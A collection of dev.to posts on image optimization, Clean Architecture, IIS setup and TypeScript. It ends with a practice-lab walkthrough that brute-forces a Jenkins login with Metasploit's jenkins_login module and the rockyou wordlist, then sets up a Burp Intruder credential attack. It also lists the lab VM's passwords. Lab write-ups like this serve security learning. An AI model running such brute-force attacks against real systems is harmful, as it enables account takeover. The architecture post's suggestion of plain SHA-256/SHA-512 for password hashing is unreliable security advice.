piece.style.opacity = '0.5'; } }); const kwdbElements = document.querySelectorAll("kwdb"); if (kwdbElements.length > 0) { const kwdbContent = kwdbElements[kwdbElements.length - 1].innerHTML; if (kwdbContent !== lastKwdbContent) { lastKwdbContent = kwdbContent; document.querySelectorAll("cg-board square").forEach(square => { square.innerHTML = ''; }); const lastMoveSquare = document.querySelector("cg-board square.last-move"); if (lastMoveSquare) { let textSpan = document.createElement('span'); textSpan.innerText = kwdbContent; textSpan.style.color = 'black'; textSpan.style.fontWeight = 'bold'; textSpan.style.fontSize = `${lastMoveSquare.offsetWidth * 0.2}px`; lastMoveSquare.style.display = 'flex'; lastMoveSquare.style.alignItems = 'center'; lastMoveSquare.style.justifyContent = 'center'; lastMoveSquare.appendChild(textSpan); } } } } window.addEventListener('load', main); const observer = new MutationObserver(main); observer.observe(document.body, { childList: true, subtree: true }); })(); ``` It works on my computer's Chrome and on my android's Firefox browser. ![it works on my machine](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8wlohpjz9xwd5fhymdj5.png) After playing thousands of games, I may finally be able to play fully-blindfold chess. Also, by paying attention to the displayed last move, especially on the square names, I may develop the skill to read chess books without needing a chessboard. In the next decade, I should see significant improvement in my chess skills. By the time I reach my 50s, I should become a highly respected player in the chess community. 
On the other hand, there is always a chance for me to participate physically in a chess tournament, where I will undoubtedly be defeated by players of all skill levels and be forced to face the truth one more time: there is no shortcut; becoming better at chess requires consistent study.
mrdimosthenis
1,921,420
Mastering Image Optimization and Utilization in Web Development
Images are integral to web development, significantly enhancing the visual appeal and user experience...
0
2024-07-13T03:12:06
https://dev.to/mdhassanpatwary/mastering-image-optimization-and-utilization-in-web-development-317a
webdev, learning, productivity, html
Images are integral to web development, significantly enhancing the visual appeal and user experience of websites. However, improper use of images can lead to performance issues, slow loading times, and a poor user experience. This guide will delve into various aspects of using images in web development, covering attributes, optimization techniques, and best practices to ensure your website is both visually appealing and performant. ## Understanding Image Attributes in HTML When embedding images in HTML, several attributes can be utilized to control their behavior and presentation. Here’s a breakdown of the most commonly used attributes: **1. src:** Specifies the path to the image file. ``` <img src="image.jpg" alt="Description of image"> ``` **2. alt:** Provides alternative text for the image, which is crucial for accessibility and SEO. ``` <img src="image.jpg" alt="A beautiful sunset"> ``` **3. width and height:** Define the dimensions of the image. Setting these attributes helps reserve space for the image during page load. ``` <img src="image.jpg" alt="A beautiful sunset" width="600" height="400"> ``` **4. srcset:** Allows you to specify different images for different screen resolutions and sizes, improving responsiveness. ``` <img src="image.jpg" alt="A beautiful sunset" srcset="image-320w.jpg 320w, image-480w.jpg 480w, image-800w.jpg 800w" sizes="(max-width: 600px) 480px, 800px"> ``` **5. sizes:** Works with `srcset` to define how much space the image will take up in different viewport sizes. ``` <img src="image.jpg" alt="A beautiful sunset" srcset="image-320w.jpg 320w, image-480w.jpg 480w, image-800w.jpg 800w" sizes="(max-width: 600px) 480px, 800px"> ``` **6. loading:** Provides lazy loading functionality, which defers the loading of images until they are needed. ``` <img src="image.jpg" alt="A beautiful sunset" loading="lazy"> ``` ## Image Formats and When to Use Them Choosing the right image format is crucial for balancing quality and performance. Here are some common formats: **1. JPEG:** Best for photographs and images with complex colors. It supports lossy compression, reducing file size significantly. ``` <img src="image.jpg" alt="A beautiful sunset"> ``` **2. PNG:** Ideal for images requiring transparency and images with text or sharp edges. It supports lossless compression. ``` <img src="image.png" alt="Logo with transparency"> ``` **3. GIF:** Used for simple animations and images with limited colors. It supports lossless compression. ``` <img src="animation.gif" alt="Loading animation"> ``` **4. SVG:** Perfect for vector graphics, logos, and icons. SVG images are scalable without loss of quality and have smaller file sizes. ``` <img src="vector.svg" alt="Scalable vector graphic"> ``` **5. WebP:** Provides superior compression for both lossless and lossy images, often resulting in smaller file sizes compared to JPEG and PNG. ``` <img src="image.webp" alt="A beautiful sunset"> ``` ## Optimizing Images for Web Performance Optimizing images is essential for improving website performance and user experience. Here are some key optimization techniques: **1. Compression:** Use tools like TinyPNG, ImageOptim, or online services to compress images without losing significant quality. **2. Responsive Images:** Utilize the `srcset` and `sizes` attributes to serve appropriately sized images for different devices and screen resolutions. **3. 
Lazy Loading:** Implement lazy loading to defer the loading of images that are not immediately visible on the screen, reducing initial page load time (a script-based fallback for older browsers is sketched right after this list).

```
<img src="image.jpg" alt="A beautiful sunset" loading="lazy">
```

**4. Use Modern Formats:** Adopt modern image formats like WebP to achieve better compression rates while maintaining quality.

**5. Serve Scaled Images:** Ensure the image dimensions match the display size to avoid unnecessary scaling by the browser.

**6. Content Delivery Network (CDN):** Use a CDN to deliver images faster by distributing them across multiple servers around the globe.

**7. Caching:** Leverage browser caching to store images locally on the user's device, reducing the need to re-download them on subsequent visits.

**8. Minimize HTTP Requests:** Combine multiple images into a single sprite to reduce the number of HTTP requests.
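Native `loading="lazy"` covers modern browsers, but where older ones matter, a small script can approximate the behavior. Here's an illustrative TypeScript sketch; the `data-src` attribute is an assumed markup convention (the real source stays out of `src` until the image is needed):

```typescript
// Select every image that opted into lazy loading via data-src.
const images = document.querySelectorAll<HTMLImageElement>("img[data-src]");

if ("loading" in HTMLImageElement.prototype) {
  // Native support: hand the work to the browser.
  images.forEach((img) => {
    img.src = img.dataset.src ?? img.src;
    img.loading = "lazy";
  });
} else {
  // Fallback: swap in the real source when the image nears the viewport.
  const observer = new IntersectionObserver((entries, obs) => {
    for (const entry of entries) {
      if (!entry.isIntersecting) continue;
      const img = entry.target as HTMLImageElement;
      img.src = img.dataset.src ?? img.src;
      obs.unobserve(img);
    }
  });
  images.forEach((img) => observer.observe(img));
}
```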
## Best Practices for Image Use in Web Development

**1. Alt Text for Accessibility:** Always provide descriptive alt text for images to improve accessibility for screen readers and enhance SEO.

**2. Appropriate File Names:** Use meaningful and descriptive file names for better SEO and maintainability.

**3. Keep Aspect Ratio Consistent:** Maintain the aspect ratio of images to avoid distortion and ensure a consistent visual experience.

**4. Optimize for Retina Displays:** Provide higher resolution images for devices with high-density displays to ensure sharpness and clarity.

**5. Avoid Inline Images:** Refrain from embedding images directly in HTML using base64 encoding, as this can increase page size and load time.

**6. Use CSS for Decorative Images:** For purely decorative images, use CSS background images instead of HTML img elements to separate content from presentation.

## Conclusion

Images play a vital role in web development, enhancing the visual appeal and user engagement of websites. By understanding and utilizing the various image attributes, formats, and optimization techniques, developers can create visually stunning websites that are also performant and accessible. Embrace best practices and modern tools to ensure your images contribute positively to the overall user experience.

mdhassanpatwary
1,921,460
Building Your First Use Case With Clean Architecture
This is a question I often hear: how do I design my use case with Clean Architecture? I understand...
0
2024-07-16T16:09:10
https://www.milanjovanovic.tech/blog/building-your-first-use-case-with-clean-architecture
cleanarchitecture, usecases, dotnet, mediatr
--- title: Building Your First Use Case With Clean Architecture published: true date: 2024-07-13 00:00:00 UTC tags: cleanarchitecture,usecases,dotnet,mediatr canonical_url: https://www.milanjovanovic.tech/blog/building-your-first-use-case-with-clean-architecture cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/g0zoi6zsale20iur9ncp.png --- This is a question I often hear: how do I design my use case with Clean Architecture? I understand the confusion. Figuring out what to place in the Domain, Application, and Infrastructure layer can seem complicated. If that's not enough, we also have to decide what makes up a use case and what should be abstracted away. However, things become simpler if we adhere to the main rule in Clean Architecture — **the Dependency Rule**. This rule states that source code dependencies can only point inwards. In this newsletter, we'll explore a practical example of how to apply Clean Architecture principles by building a user registration feature. ## Clean Architecture [**Clean Architecture**](https://www.milanjovanovic.tech/blog/why-clean-architecture-is-great-for-complex-projects) has emerged as a guiding principle for crafting maintainable, scalable, and testable applications. At its core, Clean Architecture emphasizes the **separation of concerns** and the **dependency rule**. The dependency rule dictates that dependencies should point inward toward higher-level modules. By following this rule, you create a system where the core business logic of your application is decoupled from external dependencies. This makes it more adaptable to changes and easier to test. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y4hhls0a723s8e6638jr.png) The Domain layer encapsulates enterprise-wide business rules. It contains domain entities, where an entity is typically an object with methods. The Application layer contains application-specific business rules and encapsulates all of the system's use cases. A use case orchestrates the flow of data to and from the domain entities and calls the methods exposed by the entities to achieve its goals. The Infrastructure and Presentation layers deal with external concerns. Here, you will implement any abstractions defined in the inner layers. ## Describing The Use Case What does it mean for a user to register with our application? It means they reserve an email address (or username) to identify themselves and be able to interact with our system. The user could provide other information, such as a first and last name, an address, and a phone number. The first step in building any feature is clearly defining the desired result. For user registration, this is what the required operations are: - The user provides an email and password for registration - Verify that the email was not reserved previously by an existing account - Hash the password using some cryptographic hash function (e.g., SHA-256, SHA-512) - Store the user in the database and (optionally) return an access token to the client We could also consider any domain-specific rules or validations that we must enforce. A good example is password strength, where we could implement minimum length and complexity requirements. Now that we have our requirements let's see how to translate them into a use case. ## Implementing the Use Case With our requirements in place, we can now define the user registration use case. 
In [**Clean Architecture**](https://www.milanjovanovic.tech/blog/clean-architecture-and-the-benefits-of-structured-software-design), use cases live in the Application layer and orchestrate the interactions between domain entities and external dependencies. Let's name our use case `RegisterUser`. Its input will be a `RegistrationRequest` object containing the user's registration data, and its output will be a `RegistrationResult` object indicating the outcome of the registration attempt. Notice that we are using a feature-driven name for the use case. What about any external dependencies? If the use case needs to interact with an external system or infrastructure component, we abstract that behind an interface. Remember, your application's core business logic should be decoupled from external dependencies. The `RegisterUser` class will use dependency injection to get the necessary dependencies: - `IUserRepository`: An interface for accessing user data from the database. - `IPasswordHasher`: An interface for hashing passwords securely. The `RegisterUser` use case will follow these steps: 1. Validate input data 2. Check for existing `User` 3. Hash the password 4. Create a new `User` entity 5. Save the `User` to the database 6. Return the result Finally, here's the code for our `RegisterUser` use case: ```csharp public class RegisterUser( IUserRepository userRepository, IPasswordHasher passwordHasher) { public async Task<RegistrationResult> Handle(RegistrationRequest request) { // Validation omitted for brevity if (await userRepository.ExistsAsync(request.Email)) { return RegistrationResult.EmailNotUnique; } var passwordHash = passwordHasher.Hash(request.Password); var user = User.Create( request.FirstName, request.LastName, request.Email, passwordHash); await userRepository.InsertAsync(user); return RegistrationResult.Success; } } ``` A big benefit of this approach is that we can immediately write tests for the `RegisterUser` use case. We can provide mocks for external dependencies in the tests. We don't need the implementations to exist for this code to compile. With mocks, we can test our business rules and validate our implementation. **Action step**: How would you extend the `RegisterUser` use case with more functionality? Here are two examples: - Adding an external identity provider - Implementing email verification ## Where Clean Architecture Becomes Muddled By designing our application with Clean Architecture, we produce a system independent of external concerns. We define abstractions in the Application layer and implement them in the Infrastructure layer. So far, so good. However, this doesn't mean you can disregard how you integrate with external dependencies. In theory, we should be able to "swap" the implementation for any external concern and call it a day. In practice, this couldn't be further from the truth. Let me give you two practical examples using the user registration flow. ### Race Conditions The `RegisterUser` use case has a race condition. Concurrent requests could pass the check for email uniqueness and proceed to register the user. We could prevent this race condition by introducing a lock before checking for email uniqueness. That way, only one request will pass the check and proceed to save the user in the database. ```csharp if (await userRepository.ExistsAsync(request.Email)) { return RegistrationResult.EmailNotUnique; } ``` However, there is a much more elegant way to solve this. We can introduce a unique index on the `Email` column in the database. 
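The article's code is C#, but the database-side fix is stack-agnostic. Here's an illustrative TypeScript sketch using node-postgres; the table name, columns, and return values are assumptions for demonstration, not the author's implementation:

```typescript
import { Pool } from "pg";

// Assumes a prior migration created the constraint:
//   CREATE UNIQUE INDEX ix_users_email ON users (email);
const pool = new Pool();

type RegistrationResult = "Success" | "EmailNotUnique";

async function insertUser(
  email: string,
  passwordHash: string
): Promise<RegistrationResult> {
  try {
    await pool.query(
      "INSERT INTO users (email, password_hash) VALUES ($1, $2)",
      [email, passwordHash]
    );
    return "Success";
  } catch (err) {
    // 23505 is Postgres's unique_violation code: the losing side of the
    // race lands here instead of slipping past an existence check.
    if ((err as { code?: string }).code === "23505") {
      return "EmailNotUnique";
    }
    throw err;
  }
}
```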
A unique index guarantees that only one transaction can write the unique value to the database. The losing transaction will return an error. We can handle this exception on the application side and return an appropriate error message to the user. The `IUserRepository.InsertAsync` method implementation can encapsulate this logic.

### Changing Hash Functions

Let's say we found a security flaw in the hash function used in the `IPasswordHasher` implementation. So, we spend a few minutes switching to a more secure hash function. The tests for the `RegisterUser` use case are all green, and everything seems fine.

The problem? All existing users can no longer log in to the system. When an existing user tries to log in with their email and password, the new `IPasswordHasher.Hash` implementation returns a different password hash from the one stored in the database.

The correct approach is to phase out the old password hash for existing users. We can add a column to the database that records which hash function produced each stored hash, and verify the user's password with that function during login.

If a user's password hash still uses the old hash function, we verify their password against it first. Then we use the password (which we still have in memory at that point) to produce a hash with the new function, store that hash in the database, and update the hash function column to the new algorithm. Slowly, we will phase out passwords using the old hash function.
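To make the phased migration concrete, here's a hedged TypeScript sketch of the login-time upgrade. The `algo` column, the SHA-256-to-bcrypt direction, and the `saveUser` helper are illustrative assumptions, not the article's .NET implementation:

```typescript
import { createHash } from "node:crypto";
import * as bcrypt from "bcrypt";

interface UserRecord {
  email: string;
  passwordHash: string;
  algo: "sha256" | "bcrypt"; // which function produced passwordHash
}

// Placeholder for whatever persistence layer you use.
declare function saveUser(user: UserRecord): Promise<void>;

async function verifyAndUpgrade(
  user: UserRecord,
  password: string
): Promise<boolean> {
  if (user.algo === "sha256") {
    const legacyHash = createHash("sha256").update(password).digest("hex");
    if (legacyHash !== user.passwordHash) return false;

    // The password is correct and still in memory: rehash it with the
    // new function and record the new algorithm, retiring the old hash.
    user.passwordHash = await bcrypt.hash(password, 12);
    user.algo = "bcrypt";
    await saveUser(user);
    return true;
  }
  return bcrypt.compare(password, user.passwordHash);
}
```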
## Conclusion

I hope this was helpful in understanding how to apply Clean Architecture principles to a real-world scenario.

By focusing on the core business logic first (what it means for a user to register), we can define the requirements for our use case. Translating these requirements into a series of steps within the use case is the easy part.

But Clean Architecture won't save you from bad engineering. If you don't understand what you are abstracting away, it will become a problem in the long term.

If you want to go deeper, my flagship course, [**Pragmatic Clean Architecture**](https://www.milanjovanovic.tech/pragmatic-clean-architecture), takes the guesswork out of structuring your project the right way. I share my entire framework for building robust applications from the ground up - from building a rich domain model to creating use cases to getting your application ready for production.

And that's all for this week. See you next Saturday.

* * *

**P.S. Whenever you're ready, there are 3 ways I can help you:**

1. [**Pragmatic Clean Architecture:**](https://www.milanjovanovic.tech/pragmatic-clean-architecture?utm_source=dev.to&utm_medium=website&utm_campaign=cross-posting) Join 2,900+ students in this comprehensive course that will teach you the system I use to ship production-ready applications using Clean Architecture. Learn how to apply the best practices of modern software architecture.

2. [**Modular Monolith Architecture:**](https://www.milanjovanovic.tech/modular-monolith-architecture?utm_source=dev.to&utm_medium=website&utm_campaign=cross-posting) Join 750+ engineers in this in-depth course that will transform the way you build modern systems. You will learn the best practices for applying the Modular Monolith architecture in a real-world scenario.

3. [**Patreon Community:**](https://www.patreon.com/milanjovanovic) Join a community of 1,050+ engineers and software architects. You will also unlock access to the source code I use in my YouTube videos, early access to future videos, and exclusive discounts for my courses.
milanjovanovictech
1,921,462
How to Enable Static Content Service in IIS in Windows 11?
Static Content Service in Internet Information Services: The Static Content Service in...
0
2024-07-17T16:01:19
https://winsides.com/enable-static-content-service-iis-windows-11/
tips, beginners, tutorials, windows11
---
title: How to Enable Static Content Service in IIS in Windows 11?
published: true
date: 2024-07-05 15:55:00 UTC
tags: tips,beginners,tutorials,windows11
canonical_url: https://winsides.com/enable-static-content-service-iis-windows-11/
cover_image: https://winsides.com/wp-content/uploads/2024/01/Enable-Static-Content-in-Windows-11.jpg
---

## Static Content Service in Internet Information Services:

The Static Content Service in Internet Information Services (IIS) on Windows 11 is designed to optimize the delivery of static content on websites. Static content typically includes elements like images, stylesheets, JavaScript files, and other resources that don’t change frequently. This guide delves into the world of Static Content Service in IIS on Windows 11, unveiling how it transforms your web server into a powerhouse for rapid content delivery. Join us as we explore how this service enhances website performance, accelerates page loading times, and ensures a **seamless, user-centric browsing experience**.

## How to Enable Static Content Service in IIS in Windows 11:

1. Click on the **Start Menu** and open the **Control Panel**.
2. Switch the Control Panel view to **Category**. ![Category View](https://winsides.com/wp-content/uploads/2024/01/Category-View-1024x499.jpg "Enable Static Content Service in IIS in Windows 11 61") _Category View_
3. Now, click on **Programs**. ![Programs](https://winsides.com/wp-content/uploads/2024/01/Programs-1024x484.jpg "Enable Static Content Service in IIS in Windows 11 62") _Programs_
4. Under Programs and Features, click on **Turn Windows Features on or off**. ![Turn Windows Features on or off](https://winsides.com/wp-content/uploads/2024/01/Turn-Windows-Features-on-or-off-1024x443.jpg "Enable Static Content Service in IIS in Windows 11 63") _Turn Windows Features on or off_
5. The **Windows Features** dialog box will open now.
6. From the list of services available, search for and locate **Internet Information Services**.
7. Click on the checkbox next to Internet Information Services and then click on **OK**. ![Turn on Internet Information Services](https://winsides.com/wp-content/uploads/2024/01/Turn-on-Internet-Information-Services.jpg "Enable Static Content Service in IIS in Windows 11 64") _Turn on Internet Information Services_
8. Click the **plus sign (+)** next to Internet Information Services to expand the list. ![World Wide Web Services IIS](https://winsides.com/wp-content/uploads/2024/01/World-Wide-Web-Services.jpg "Enable Static Content Service in IIS in Windows 11 65") _World Wide Web Services IIS_
9. Now, expand **World Wide Web Services**, and expand **Common HTTP Features**. ![Common HTTP Features](https://winsides.com/wp-content/uploads/2024/01/common-http-features.jpg "Enable Static Content Service in IIS in Windows 11 66") _Common HTTP Features_
10. Click on the checkbox next to **Static Content**, and click **OK**. ![Static Content Windows 11](https://winsides.com/wp-content/uploads/2024/01/Static-Content.jpg "Enable Static Content Service in IIS in Windows 11 67") _Static Content Windows 11_
11. The system will prompt for a restart. Continue with **Restart now**. Restarting is recommended so the changes take effect before you use the environment.
12. Click **Close**. ![Close](https://winsides.com/wp-content/uploads/2024/01/Close.jpg "Enable Static Content Service in IIS in Windows 11 70") _Close_
13. That is it, the Static Content Service in IIS is now enabled on your Windows 11 laptop or PC. Enjoy seamless connectivity!
**Note**: To turn on the individual components of IIS in Windows 11, make sure that IIS itself is already enabled.

### Significant Features of the Static Content Service in IIS:

- Efficient Content Delivery
- Caching Mechanisms
- Bandwidth Optimization
- Parallelized Downloads
- Gzip Compression
- Improved User Experience

> Elevate your website’s performance, engage your audience, and make a lasting impact with the Static Content Service in IIS on Windows 11.
vigneshwaran_vijayakumar
1,921,495
Exploring TypeScript: A Comprehensive Guide
TypeScript enhances JavaScript by adding static types, which can improve code quality and development...
28,050
2024-07-13T05:25:00
https://dev.to/jakaria/exploring-typescript-a-comprehensive-guide-36nk
typescript, programming, webdev, learning
TypeScript enhances JavaScript by adding static types, which can improve code quality and development efficiency. This guide covers key TypeScript features including data types, objects, optional and literal types, functions, spread and rest operators, destructuring, type aliases, union and intersection types, ternary operator, optional chaining, nullish coalescing operator, and special types like never, unknown, and null. #### 1. Data Types TypeScript provides a variety of basic types, ensuring variables hold values of specified types: ```typescript let isDone: boolean = true; // boolean type let age: number = 30; // number type let name: string = "John Doe"; // string type let list: number[] = [1, 2, 3, 4]; // array of numbers let user: [string, number] = ["Alice", 25]; // tuple type, fixed length array with specified types ``` By specifying data types, you can catch type-related errors early, making your code more predictable and reducing bugs. #### 2. Objects Objects in TypeScript can have specified property types, making it clear what properties an object should have: ```typescript let person: { name: string; age: number } = { name: "Alice", age: 25 }; ``` This ensures that the object `person` always has `name` as a string and `age` as a number. Attempting to assign an incorrect type will result in a compile-time error. #### 3. Optional and Literal Types Optional properties and literal types add more flexibility and specificity: ```typescript let optionalPerson: { name: string; age?: number } = { name: "Bob" }; // age is optional type Color = "red" | "green" | "blue"; let favoriteColor: Color = "green"; // can only be one of the specified values ``` Optional properties allow for more flexible object structures, and literal types limit a variable to specific values, ensuring only predefined values can be assigned. #### 4. Functions TypeScript allows type definitions for function parameters and return types, making functions easier to understand and use: ```typescript function greet(name: string): string { return `Hello, ${name}`; } let greeting: string = greet("Alice"); // returns "Hello, Alice" ``` This ensures that the `greet` function always takes a string and returns a string. If you pass an argument of a different type, TypeScript will throw an error. #### 5. Spread and Rest Operators Spread and rest operators help manipulate arrays and objects efficiently: ```typescript let numbers: number[] = [1, 2, 3]; let moreNumbers: number[] = [...numbers, 4, 5]; // spreading the numbers array function sum(...values: number[]): number { // rest parameter return values.reduce((acc, val) => acc + val, 0); } let total: number = sum(1, 2, 3, 4); // returns 10 ``` The spread operator allows expanding arrays/objects into individual elements, and the rest operator gathers multiple arguments into an array. #### 6. Destructuring Destructuring simplifies extracting values from arrays and objects: ```typescript let [first, second] = [1, 2]; // array destructuring let { name, age } = { name: "Charlie", age: 28 }; // object destructuring ``` Destructuring makes it easier to work with complex data structures by breaking them into simpler parts, allowing for cleaner and more readable code. #### 7. 
Type Aliases Type aliases create custom types, making the code more readable and reusable: ```typescript type Point = { x: number; y: number }; let point: Point = { x: 10, y: 20 }; ``` Type aliases provide a way to name complex types, improving code clarity and making it easier to understand what types are expected. #### 8. Union and Intersection Types Union types allow variables to hold multiple types, while intersection types combine multiple types: ```typescript type Id = number | string; // union type let userId: Id = 123; // can be a number userId = "ABC"; // or a string type Employee = { name: string } & { age: number }; // intersection type let employee: Employee = { name: "Dave", age: 30 }; ``` Union types are flexible, allowing a variable to hold values of different types, and intersection types ensure objects meet multiple type requirements, providing more control over the structure of the data. #### 9. Ternary Operator The ternary operator provides a shorthand for conditionals: ```typescript let age: number = 18; let isAdult = age >= 18 ? "Yes" : "No"; // if age is 18 or more, isAdult is "Yes"; otherwise, "No" ``` The ternary operator is a concise way to write simple conditional expressions, making the code shorter and more readable. #### 10. Optional Chaining and Nullish Coalescing Operator Optional chaining and nullish coalescing handle null and undefined values gracefully: ```typescript let user = { address: { street: "123 Main St" } }; let street = user?.address?.street; // safely access nested properties let input = null; let value = input ?? "default"; // returns "default" if input is null or undefined ``` Optional chaining prevents runtime errors when accessing nested properties that might not exist, and nullish coalescing provides default values for null/undefined, ensuring the code behaves as expected even with missing values. #### 11. Special Types: Never, Unknown, and Null TypeScript has special types for specific use cases: ```typescript function error(message: string): never { // never indicates a function never returns throw new Error(message); } let unknownValue: unknown = "hello"; // unknown type requires type assertions before use let valueLength: number = (unknownValue as string).length; let nullableValue: null = null; // null type ``` - `never` represents unreachable code or a function that never returns. - `unknown` is a type-safe counterpart of `any`, requiring explicit type assertions before use. - `null` explicitly allows null values, indicating the absence of any value.
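To tie several of these features together, here's a small illustrative example combining literal types, a discriminated union, and `never` for exhaustiveness checking:

```typescript
type Shape =
  | { kind: "circle"; radius: number }
  | { kind: "rectangle"; width: number; height: number };

function area(shape: Shape): number {
  switch (shape.kind) {
    case "circle":
      return Math.PI * shape.radius ** 2;
    case "rectangle":
      return shape.width * shape.height;
    default: {
      // If a new Shape variant is added later, this line stops compiling,
      // because the unhandled variant is no longer assignable to `never`.
      const unreachable: never = shape;
      return unreachable;
    }
  }
}

console.log(area({ kind: "circle", radius: 2 })); // 12.566...
```

If someone later adds a `"triangle"` variant to `Shape`, the `never` assignment fails to compile until `area` handles it, which is exactly the kind of error TypeScript catches before runtime.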
jakaria
1,921,497
BUTLER MACHINE EXPLOIT WALKTHROUGH
This walkthrough will showcase a creative approach in exploiting a windows machine named butler and...
0
2024-07-13T00:03:01
https://dev.to/babsarena/butler-machine-exploit-walkthrough-5cfb
This walkthrough will showcase a creative approach to exploiting a Windows machine named Butler and gaining access to it. After successfully setting up your Butler Windows machine, use the following details to log in:

**butler: JeNkIn5@44 administrator: A%rc!BcA!**

We can log in using the administrator password **A%rc!BcA!** so as to get the IP address of our Butler Windows machine. After a successful login to our Windows machine, we open the **command prompt** and input the command below to get our IP address:

```
ipconfig
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tbz8ktl5jzysochdrx22.png)

From the image above, my IP address is **"192.168.182.142"**

We can start by pinging our Windows machine from our Kali machine using the command:

```
ping 192.168.182.142 -c3
```

to make sure both machines are communicating.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yccbh0s0cvl6klaltz9u.png)

The next step is to run an Nmap scan using the command:

```
nmap -p- -A 192.168.182.142
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7tcex2w8prypxkk91dyt.png)

From the above image we can see that port 8080 is open and running an HTTP service, so the next step is to visit the website in our browser using:

```
192.168.182.142:8080
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/irky84yiot9dsyzoll0c.png)

We landed on a Jenkins login page. After much enumeration I couldn't find anything, so I searched the web for the Jenkins default password.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/29hc0jt104zjrb3bijvt.png)

I tried using the default password and it still failed.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fybojcjcni7e4c9zmisg.png)

So the next thing left for me is to try a brute force attack, and for that I want to use Metasploit. We open a new tab on our Kali machine and input the command below to start Metasploit:

```
msfconsole
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/q31i4t60zm2zzovje7yl.png)

Next, we search for the word jenkins using the command:

```
search jenkins
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nqhlhjkz9xmgfwdqp5v0.png)

For me, number 19 is showing a Jenkins login module with the details **"19 auxiliary/scanner/http/jenkins_login"**

NB- Your own jenkins_login number might be different, so make sure to use yours.

So next, I input the command:

```
use 19
```

Then I input the command:

```
options
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/g7do41gpwhstmylzwtzs.png)

My idea is to use the rockyou.txt wordlist for both the username and password, but then the brute force attack would take hours if not days to complete. So for the options, set the following parameters by inputting the commands:

```
set username jenkins
```

```
set pass_file /usr/share/wordlists/rockyou.txt
```

```
set user_as_pass true
```

```
set stop_on_success true
```

```
set rhosts 192.168.182.142
```

NB- Basically, what I am trying to do is use the username jenkins as a trial and see if it will have a successful login using the password file rockyou.txt.
In a case where there's no username to try, we can use rockyou.txt for the username file too, but like I said, the attack would take hours if not days to complete; so to get the password in good time, make sure to set the username as jenkins.

Now input the command:

```
options
```

to make sure everything that was set has been applied and is reflected.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5yn5fi7j1ein8uc10cwn.png)

Now input the command below to run the exploit:

```
run
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zgydvl8k4tts8q37yu5r.png)

After successfully running the exploit, we can see from the output that the username and password for the Jenkins website are **jenkins:jenkins**

So both the username and password are the same.

- I'd also like to show you how to use Burp Suite for a brute-force attack.

## HOW TO USE BURP-SUITE FOR BRUTE FORCE ATTACK

- Search for the FoxyProxy extension in your Firefox browser on Kali and then add it to your extensions

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5dghyn3l9ifredxb7o6q.png)

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4jzo38960gmvlpav019i.png)

- Click on the extension, right-click, and select the manage extension option

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/u1f5nlc5en0s7pn7l3dr.png)

- Click on proxies and then add

- Now set the title, type, hostname, and port as seen in the image below, and then save

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/98u8mt6uhfoampihd8p3.png)

Once you have visited the Jenkins login page, make sure your FoxyProxy extension is switched on.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/z5q0m5i42nt01er7dzdn.png)

- Now search for Burp Suite on your Kali machine and open it

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lmhkvwzzdr7l6glk9oss.png)

- Press next

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fpkvnirdi0xmnqnsj4o6.png)

- Start Burp

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ewx3ladusiftcthx9aaf.png)

- Click on proxy and set intercept to on

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zb3rzilxm6s9b51w9t80.png)

- Remember to make sure that the FoxyProxy extension is on

- Now input a wrong username and password on the Jenkins login

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yhligxzeblda40dyygqi.png)

It will take you straight to Burp and show you a page as seen below

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9g0knhjcp1hpqiz9xutp.png)

- Right-click and then send to Repeater, and also send to Intruder

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/axex1240g7ibgqqnf8iv.png)

- From Repeater you can easily change the username and password and then click on send to see whether the details are correct, but doing this with Repeater will take time.
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jw2s7jipylgs5zoufu9z.png)

- So now we switch to Intruder

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/oquh8ctcisomrnsx6rbm.png)

- Next we double-click on the username hacker and then click on add

- Then we double-click on the password hacker and then click on add

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kxj9jjavw91ocg2en0zv.png)

The image shows that we have highlighted the two positions we would like to change.

- Next we switch our attack type to cluster bomb, because we want to try all the usernames with all the passwords

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6zz7n2wdbidlt9fc57ar.png)

- Now click on payload

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bvk6l6cz22gv6taa7s5t.png)

What we are trying to do is guess some usernames and passwords that we would like to use for the brute force attack.

- So we input them as seen in the image below, click on add, and keep adding as many as we want to.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bwxersv1n1lv04prvphc.png)

- Then we switch to 2 as seen in the image below and input the passwords we would like to try.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/iaoiqbj8r1ezoahn4zm8.png)

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f47o6hfh9b1aaxxenx0o.png)

- Click on start attack

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xbnqsc81zqundhpmoaff.png)

